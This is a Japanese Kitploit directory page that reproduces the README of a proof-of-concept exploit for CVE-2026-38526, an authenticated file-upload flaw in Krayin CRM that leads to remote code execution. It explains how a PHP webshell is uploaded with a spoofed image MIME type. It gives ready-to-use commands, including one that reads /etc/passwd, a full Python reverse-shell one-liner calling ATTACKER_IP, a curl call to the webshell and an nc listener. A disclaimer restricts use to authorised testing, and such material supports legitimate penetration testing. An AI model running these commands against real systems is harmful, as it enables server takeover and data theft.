Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2026-38526 — Automated exploit for Krayin CRM ≤ 2.2.x. | Kitploit
ツール/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Automated exploit for Krayin CRM ≤ 2.2.x.

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38526 - Krayin CRM PHPアップロードRCE

Krayin CRM ≤ 2.2.x 向けの自動エクスプロイトです。このスクリプトは、TinyMCEエンドポイント(/admin/tinymce/upload)における無制限ファイルアップロードの脆弱性を悪用し、image/jpeg を偽装してMIMEタイプ検証をバイパスし、PHPウェブシェルをアップロードして、ウェブサーバー権限で任意のコマンドを実行します。


脆弱性の詳細

プロパティ値
CVE IDCVE-2026-38526
影響を受けるソフトウェアKrayin CRM ≤ 2.2.x
脆弱性の種類無制限ファイルアップロード → リモートコード実行
認証必須(有効な管理者アカウント)
エンドポイントPOST /admin/tinymce/upload

前提条件

  • Python 3.7以上
  • 対象のKrayin CRMインスタンスの有効な管理者資格情報
  • 対象アプリケーションへのネットワークアクセス
  • requests ライブラリ

インストール

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

使用方法

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

引数

使用例

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

エクスプロイトの流れ

  1. 認証: ログインページからCSRFトークンを抽出し、提供された資格情報で認証します
  2. セッション検証: 認証済みダッシュボードから新しいCSRFトークンを抽出します
  3. ウェブシェルのアップロード: 偽装したMIMEタイプでPHPペイロードを /admin/tinymce/upload にアップロードします
  4. コマンド実行: ウェブシェルのGETパラメータを介して任意のコマンドを実行します

出力例

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

既知の問題

認証に失敗する: 資格情報が正しいこと、および対象システムにアカウントが存在することを確認してください。

CSRFトークンの抽出に失敗する: 対象が脆弱性のあるKrayin CRMを実行していること、およびログインエンドポイントにアクセスできることを確認してください。

リバースシェルが接続しない: リスナー(nc -lvnp <PORT>)が実行されていること、ファイアウォールが発信接続を許可していること、ペイロード内のIP/ポートが正しいことを確認してください。


免責事項

このツールは、許可されたセキュリティテストおよび教育目的のためだけに提供されています。コンピュータシステムへの不正アクセスは違法です。対象システムをテストする前に適切な許可を得ていることを確認する責任は、すべて利用者にあります。作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。


参考情報

  • TREXNEGRO セキュリティアドバイザリ - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - 無制限ファイルアップロード

作者

b0nyo - PoC実装

  • GitHub

TREXNEGRO - 脆弱性の発見

  • セキュリティアドバイザリ
ツールをダウンロード
フラグ説明例
-i対象URL(http:// の有無は問いません)http://target.com または target.com
-u管理者のメールアドレス/ユーザー名[email protected]
-p管理者のパスワードAdminPassword123!
-c実行するコマンド(デフォルト: id)whoami